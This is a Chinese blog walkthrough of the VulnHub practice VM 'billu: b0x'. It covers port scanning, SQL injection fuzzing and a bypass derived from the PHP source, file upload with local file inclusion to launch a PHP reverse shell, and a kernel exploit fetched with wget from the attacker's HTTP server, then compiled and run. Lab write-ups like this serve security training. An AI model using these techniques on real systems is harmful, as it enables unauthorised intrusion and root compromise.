靶机 build_b0x (vulnhub)

最新推荐文章于 2023-01-05 15:44:20 发布
最新推荐文章于 2023-01-05 15:44:20 发布
阅读量520 收藏
点赞数
分类专栏: Vulnhub靶场 文章标签: 安全 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wcl20010/article/details/124993060
版权

billu: b0x ~ VulnHub

导入时需要注意:MAC地址需要全选,不然发现不了IP

1.主机发现

arp-scan -l

2.端口扫描

nmap -p- 192.168.56.107 
nmap -p22,80 -sV -sC 192.168.56.107 
直接nmap -A 192.168.56.107 也是可以的

22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 fa:cf:a2:52:c4:fa:f5:75:a7:e2:bd:60:83:3e:7b:de (DSA)
|   2048 88:31:0c:78:98:80:ef:33:fa:26:22:ed:d0:9b:ba:f8 (RSA)
|_  256 0e:5e:33:03:50:c9:1e:b3:e7:51:39:a4:4a:10:64:ca (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-title: --==[[IndiShell Lab]]==--
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.2.22 (Ubuntu)

3.漏洞发现

SQL注入

进去网页一眼看出SQL注入。那就尝试下万能密码,不行直接上工具爆破

使用kali的字典:

payload1 选择/usr/share/seclists/Fuzzing/SQLi/Generic-SQLi.txt文件,payload2 选择 burp自带的字典Fuzzing - SQL injection

 

然后我们筛选下结果:

 

文件上传

只能先这么上传了。这样也没法利用。因为不能解析,看看存不存在文件包含漏洞

 路径很容易找

目录扫描

dirsearch -u http://192.168.56.107
发现了add.php 就是文件上传的功能

 

为什么还单独搞一个add.php 呢。难道包含文件了吗,我们点add user 抓包查看下:

从这里看到抓包显示了add这个参数,那我们去测试下是否包含文件了

但是经过我们的测试,无法进行包含我们的png文件

4.反弹shell

那我们换种木马进行测试:使用反弹shell木马

使用kali下的/usr/share/webshells/php/php-reverse-shell.php,用于nc反弹shell。修改下配置

 

跟上次上传的方法一样:kali上监听端口,然后这里利用文件包含执行

 

成功反弹shell,升级shell

5.提权

查看系统版本:3.13.0

kali查漏洞

searchsploit 3.13.0

把文件弄出来,改个名方便操作,开启http服务在靶机下载文件

下载文件:注意开放的端口

wget http://192.168.56.102:8000/exp.c
gcc exp.c -o exp      //编译
chmod +x exp
./exp


另一种方法

还记得在目录扫描时发现了test.php吗。打开内容很明显,测试下但是没用,抓包看一下

建议以后GET请求转POST请求的包时,先发GET然后直接在burp中使用

我手动添加请求测试了很多次都不行,最后把整个GET请求的包转换才没问题

 

通过观察发现这里似乎更像是文件读取

还可以分析下sql语句:转义  \  为  空格
$uname=str_replace('\'','',urldecode($_POST['un']));
$pass=str_replace('\'','',urldecode($_POST['ps']));
$run='select * from auth where  pass=\''.$pass.'\' and uname=\''.$uname.'\'';
语句可以转换为
$run='select * from auth where  pass=''.$pass.'' and uname=''.$uname.''';
$run='select * from auth where  pass='pass' and uname='uname'';
我们在pass中输入的是  \   那么带进去也就是   ' \'  ==》 ' '
我们在uname中输入的是  or 1=1 #   带进去   ' or 1=1 # ''    #后面注释掉
$run='select * from auth where  pass=' ' and uname='  or 1=1#

所以上面的sql语句就是闭合的 但是后面的 or 1=1 # 是永真的

继续访问文件:

 

目录扫描得到的phpmy目录就是数据库管理界面

也能发现登录密码

 

继续目录扫描:看看有什么把

dirsearch -u  http://192.168.56.107/phpmy/

 再利用漏洞读文件:

看着像系统密码:本机还开启了ssh服务。直接测试下

ssh root@192.168.56.107

出现报错是因为上次连接过但是而且与上次记录的不同,使用

ssh-keygen -R 192.168.56.107

这样就结束了

ProofM
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机渗透学习----Billu_b0x
qq_42133828的博客
06-07 2906
靶机下载地址及安装环境 靶机下载地址:https://download.vulnhub.com/billu/ 靶机环境:处于net网络下的VM虚拟机 渗透实战 攻击机:192.168.146.131 靶 机:192.168.146.133(扫描后得到的) 1.安装完后,由于不知道node靶机的地址,所以渗透第一步就是发现主机: 1)使用nmap快速扫描,发现存活主机: nma...
VulnHub靶机渗透】三:Billu_b0x
野原新之助
04-06 907
靶机设定了一些常见的Web应用漏洞,如文件包含、任意文件下载、注入等。 (VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有相关目标去完成。)
Billu-b0x靶机渗透实战-vuluhub系列(九)
PANDA墨森的博客
07-09 402
这是vulnhub靶机系列文章的第九篇,昨天因为学习的过程中卡壳了,搞到最后解决后,但是没精力了就没更新了....,本次主要知识点为:任意文件下载漏洞、sql注入代码审计,文件包含代码审计、文件上传绕过getshell,linux内核溢出提权 靶机下载地址: https://www.vulnhub.com/entry/billu-b0x,188/ 原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13217674.html #001 环境搭建(nat) 攻击机:k
记一次靶场实战【网络安全
kali_Ma的博客
01-05 8625
可以得到靶机开放了22和80端口,使用的是Apache2.2.22和Ubuntu,内核是Linux3.2-4.9。 接下来用御剑暴破下目录。
whoami靶场渗透测试
西电卢本伟的博客
04-27 3339
靶机渗透,文件下载,上传,包含漏洞,sql注入漏洞,提权
靶机练习之Billu_b0x
10-04
通过该靶场,能够初步了解web渗透的基本流程。小白在了解了web各种漏洞原理,之后,可以练习一下该靶场,靶场做法很多。我也是一个小白,来这里记录一下学习的过程,不喜勿喷!!!感谢!!!
vulnhub靶机实战-My-cmsms靶机
最新发布
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
靶机Moonraker_1练习报告1
08-08
靶机Moonraker_1练习报告1
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Metasploitable2靶机漏洞_hanxu.doc
09-28
Metasploitable2靶机漏洞_hanxu.doc
MyOA.rar_easy _myoa_myoa靶机_oa_ssh mysql 框架
09-24
【标题】"MyOA.rar_easy_myoa_myoa靶机_oa_ssh mysql 框架" 描述了一个基于SSH框架和MySQL数据库的在线办公(OA)系统,名为MyOA,并且它具有一个易于使用的前端界面——Easy UI。这个项目可能用于企业内部的自动化...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Billu_b0x2内网渗透(多种提权方法)靶场-vulnhub
qq_35664104的博客
10-03 1669
本次来试玩一下vulnhub上的Billu_b0x2,下载地址。 下载下来后是 .ova 格式,建议使用vitualbox进行搭建,vmware可能存在兼容性问题。靶场推荐使用NAT(共享)模式,桥接模式可能会造成目标过多不易识别。 IP win7: 192.168.31.44 kali: 192.168.31.17 靶机: 192.168.31.132 信息搜集 主机发现得到靶机ip,接着进行端口扫描 nmap -sV -A -p- 192.168.31.132 开放了22, 80,
VulnHub靶场之Billu_b0x
M_onster_d的博客
09-10 600
VulnHub靶场之Billu_b0x 靶机下载地址 [https://download.vulnhub.com/billu/Billu_b0x.zip] 虚拟机配置 下载的虚拟机是 ova 格式,当然装载到 virtualbox 上最好,也可以装载到vmware workstation上,本人电脑上是workstation,所以装载到workstation上。 打开虚拟机的过程中,可以会出现 “未通过 OVF 规范一致性” 的版本问题,此时需要重新下载 ovftool 工具(忘了从哪下载了…但是网上可
记一次靶机练习之Billu_b0x
ww564的博客
10-04 478
靶机练习之Billu_b0x 一、前言 这个靶场算是入门级别的吧·!对于我这个小白来说还是有一定难度的。在做题过程中遇到的问题,也侧面反映了自己对于web渗透认识还是不足的,,还需要更进一步的学习。 二、信息收集 1、主机发现 Nmap扫描同子网段下的主机 nmap -sP 192.168.79.0/24 发现同网段的192.168.79.150存活主机 2、扫描端口 发现目标主机开放了22,80端口 打开浏览器查看 3、扫描网站目录 三、漏洞发现与利用 逐一访问之前探测出来的页面,在访问到test
Billu_b0x渗透总结
qq_45300786的博客
06-05 4652
Billu_b0x这个靶机也是断断续续的才做完,途中遇到了很多不懂的,但是这也表明进步的空间很大,这个靶机很适合我们这种初级的学习者,其中不乏趣味性,也有点难度,但总体思路是清晰的,有兴趣的同学不妨试试。 1.主机发现 arp-scan -l 或者 nmap -sn 192.168.223.0/24 -oG - 2.端口扫描 nmap -sS 192.168.223.132 或者 nmap -sS -A -Pn -p- -n 192.168.223.132 或者 nmap 192.168.223.0/24
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值